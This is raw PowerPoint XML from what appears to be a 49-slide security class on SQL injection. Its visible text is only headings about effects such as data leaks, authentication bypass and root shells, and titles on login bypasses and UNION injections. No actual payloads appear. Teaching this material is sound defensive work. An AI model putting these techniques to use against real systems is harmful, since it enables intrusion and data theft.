            <a:off x="2743200" y="4044405"/>
            <a:ext cx="3326731" cy="2051595"/>
            <a:chOff x="3323118" y="2768505"/>
            <a:chExt cx="4067370" cy="2508346"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2266BCAB-9B31-45E0-A1FE-5625375CA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118" y="3429001"/>
              <a:ext cx="2476500" cy="1847850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Picture 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23B30D10-1318-4B30-B928-064D2828E0CD}"/>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752297" y="2768505"/>
              <a:ext cx="638191" cy="1350222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5181AF74-0DEA-4DB0-940E-D966F03EE361}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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V="1">
              <a:off x="4953000" y="3047999"/>
              <a:ext cx="2133602" cy="2133600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A84274E-6BBB-4BAB-9C7A-E26007EBF23A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800944" y="4495800"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="TextBox 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D476557-29FA-442B-935E-89256E8D045C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44293" y="457200"/>
            <a:ext cx="9048750" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3598D9"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL INJECTIONS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CAUSE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="Straight Connector 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{152F6ACA-EFCB-4E18-8145-574D1D7D056C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2286000"/>
            <a:ext cx="365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6740BDB-1611-4CBD-8EC2-9511B19AF01C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2828836"/>
            <a:ext cx="1974003" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F26522"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F26522"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LEAKS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ABAB7F3-FB47-47F4-A90E-30A62FB23326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3392404" y="2828836"/>
            <a:ext cx="2359193" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2DA5D5"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AUTH </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2DA5D5"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BYPASS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C04B17C4-272B-4AC2-9645-A30C10752463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732589" y="2828836"/>
            <a:ext cx="2182811" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ROOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SHELLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="Group 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C951E67A-CE91-4915-B245-613C64C58D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6625187" y="4038600"/>
            <a:ext cx="2397613" cy="1986595"/>
            <a:chOff x="6812345" y="4533444"/>
            <a:chExt cx="2128757" cy="1763829"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="Picture 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F11D50E2-48FF-428C-85A1-DEEB481A9B12}"/>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12345" y="5316754"/>
              <a:ext cx="2128757" cy="980519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="Picture 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AA19CD-ABC0-407D-A777-3E2F9732D1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93600" y="4533444"/>
              <a:ext cx="848809" cy="848809"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372263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7555</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>860</Paragraphs>
  <Slides>49</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Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Trilogy_Class_Template</vt:lpstr>
      <vt:lpstr>The Art &amp; Science of SQL Injection</vt:lpstr>
      <vt:lpstr>Today’s Goals</vt:lpstr>
      <vt:lpstr>Breakdown of the Day </vt:lpstr>
      <vt:lpstr>SQL Warm-Up</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injections </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL Injections </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The User-Input Lifecycle</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Anatomy of a Substitution</vt:lpstr>
      <vt:lpstr>Anatomy of a Malicious Substitution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Login Bypasses</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Anatomy of the Classic Login Bypass</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>In-Band SQL Injections</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Anatomy of a UNION Injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation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creator>ahaque89</dc:creator>
  <cp:lastModifiedBy>Ann John</cp:lastModifiedBy>
  <cp:revision>4322</cp:revision>
  <cp:lastPrinted>2016-01-30T16:23:56Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-20T17:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-02T19:24:56Z</dcterms:modified>
</cp:coreProperties>
</file>